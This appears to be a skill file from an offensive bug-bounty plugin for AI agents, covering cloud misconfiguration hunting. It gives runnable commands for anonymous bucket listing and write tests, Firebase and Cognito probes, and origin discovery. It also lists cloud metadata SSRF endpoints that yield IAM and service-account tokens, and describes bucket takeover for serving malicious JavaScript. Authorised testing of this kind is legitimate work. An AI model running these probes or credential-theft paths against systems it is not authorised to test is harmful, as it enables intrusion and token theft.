Cloud infrastructure misconfiguration hunting - S3/GCS/Azure bucket takeover, cloud metadata SSRF, IAM policy analysis, serverless exposure, and CDN origin discovery
From greyhatccnpx claudepluginhub overtimepog/greyhatcc --plugin greyhatccThis skill uses the workspace's default tool permissions.
Designs and optimizes AI agent action spaces, tool definitions, observation formats, error recovery, and context for higher task completion rates.
Enables AI agents to execute x402 payments with per-task budgets, spending controls, and non-custodial wallets via MCP tools. Use when agents pay for APIs, services, or other agents.
Compares coding agents like Claude Code and Aider on custom YAML-defined codebase tasks using git worktrees, measuring pass rate, cost, time, and consistency.
/greyhatcc:cloud <domain or program_name>
{{ARGUMENTS}} is parsed automatically — just provide a target in any format:
No format specification needed from user — detect and proceed.
Before executing, follow the context-loader protocol:
Pull cloud references from existing recon data:
Sources to mine:
- JS bundles (js-analysis skill output) → S3 URLs, Firebase refs, Cognito pools
- CSP headers → S3 bucket names, CloudFront distributions, GCS buckets
- DNS records → CNAME to cloud services, ELB hostnames
- Subdomains → *.s3.amazonaws.com, *.blob.core.windows.net patterns
- HTTP responses → X-Amz-*, X-GCloud-*, Azure headers
- Error pages → Cloud provider error signatures
- Source maps → Infrastructure URLs in original source
# Check bucket names derived from: domain, org name, common patterns
# Pattern: <domain>, <domain>-assets, <domain>-backup, <domain>-dev, <domain>-staging,
# <domain>-uploads, <domain>-media, <domain>-static, <domain>-logs,
# <org>-<service>, <org>-production, <org>-internal
# Check bucket existence and permissions
aws s3 ls s3://<bucket-name> --no-sign-request 2>&1
# 200 = public listing (HIGH finding)
# AccessDenied = exists but private (note for later)
# NoSuchBucket = doesn't exist (potential takeover if referenced)
# Check for public write
echo "test" | aws s3 cp - s3://<bucket-name>/pentest_write_test.txt --no-sign-request 2>&1
# If succeeds = CRITICAL finding (public write)
# IMMEDIATELY delete: aws s3 rm s3://<bucket-name>/pentest_write_test.txt --no-sign-request
# Check blob containers
curl -sk "https://<storage-account>.blob.core.windows.net/<container>?restype=container&comp=list"
# 200 with XML = public listing
# Check GCS buckets
curl -sk "https://storage.googleapis.com/<bucket-name>"
# 200 = public listing
# Check Firebase Realtime Database
curl -sk "https://<project-id>.firebaseio.com/.json"
# 200 with data = public read (HIGH/CRITICAL)
# Check Firestore
curl -sk "https://firestore.googleapis.com/v1/projects/<project-id>/databases/(default)/documents"
# Check Firebase Storage
curl -sk "https://firebasestorage.googleapis.com/v0/b/<project-id>.appspot.com/o"
# 200 with items = public listing
# Check Firebase Storage write (upload a test file)
curl -sk -X POST \
"https://firebasestorage.googleapis.com/v0/b/<project-id>.appspot.com/o?name=pentest_write_test.txt" \
-H "Content-Type: text/plain" \
-d "pentest write test - overtimedev"
# 200 = CRITICAL: public write to Firebase Storage
# If pool ID is known (from JS analysis):
aws cognito-idp describe-user-pool-client \
--user-pool-id <pool-id> \
--client-id <client-id> \
--region <region> 2>&1
# Check self-signup
aws cognito-idp sign-up \
--client-id <client-id> \
--username test@test.com \
--password TestPass123! \
--region <region> 2>&1
# If no CAPTCHA/verification = hCaptcha bypass (finding)
# Shodan SSL cert search for origin IPs behind CDN
# Use MCP: shodan_ssl_cert with target domain
# Historical DNS for pre-CDN IPs
# Use MCP: dns_records + WebSearch for SecurityTrails/ViewDNS
# SPF record leakage (mail servers often on origin)
dig +short TXT <domain> | grep spf
# Check if apex vs www have different CDN behavior
dig +short <domain>
dig +short www.<domain>
Cloud metadata endpoints to target:
AWS IMDSv1 (no headers needed):
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
AWS IMDSv2 (needs PUT for token first):
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
GCP:
http://metadata.google.internal/computeMetadata/v1/ (needs Metadata-Flavor: Google header)
http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
Azure:
http://169.254.169.254/metadata/instance?api-version=2021-02-01 (needs Metadata: true header)
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
DigitalOcean:
http://169.254.169.254/metadata/v1/
Kubernetes:
https://kubernetes.default.svc/api/v1/
/var/run/secrets/kubernetes.io/serviceaccount/token
Check for internal hostnames in public DNS (found in recon):
- *.internal.<domain> → often resolves to RFC1918 IPs
- autoqueue.internal.*, worker.internal.*, etc.
- These are SSRF pivot targets if any SSRF exists
A bucket is takeover-able when:
1. The target references it (in CSP, JS, DNS CNAME, etc.)
2. The bucket doesn't exist (NoSuchBucket) or was deleted
3. An attacker can create a bucket with the same name
Check: Is the bucket referenced in a security-sensitive context?
- CSP script-src → attacker serves malicious JS = XSS on the target (CRITICAL)
- Asset loading (images, CSS) → content injection (MEDIUM)
- CNAME to S3 → subdomain takeover (HIGH)
- Backup/data bucket → data exposure or supply chain (HIGH-CRITICAL)
Check for:
- CNAME → *.s3.amazonaws.com that returns NoSuchBucket
- CNAME → *.herokuapp.com that returns "no such app"
- CNAME → *.azurewebsites.net that returns "not found"
- CNAME → *.cloudfront.net with no distribution
- CNAME → *.elasticbeanstalk.com that's unclaimed
- NS records pointing to decommissioned DNS providers
bug_bounty/<program>_bug_bounty/recon/cloud/
├── buckets.md → All discovered buckets with access status
├── firebase.md → Firebase project findings
├── cognito.md → Cognito pool enumeration results
├── cdn_origins.md → Origin IPs discovered behind CDN
├── cloud_metadata.md → SSRF/metadata test results
├── takeover_candidates.md → Dangling cloud resources for takeover
└── cloud_summary.md → Executive summary with findings
/greyhatcc:findingsrecon-specialist-high (opus) with this skillrecon-specialist-low (haiku)recon-specialist (sonnet)exploit-developer (opus)When delegating to agents via Task(), ALWAYS:
After completing this skill:
tested.json — record what was tested (asset + vuln class)gadgets.json — add any informational findings with provides/requires tags for chainingfindings_log.md — log any confirmed findings with severity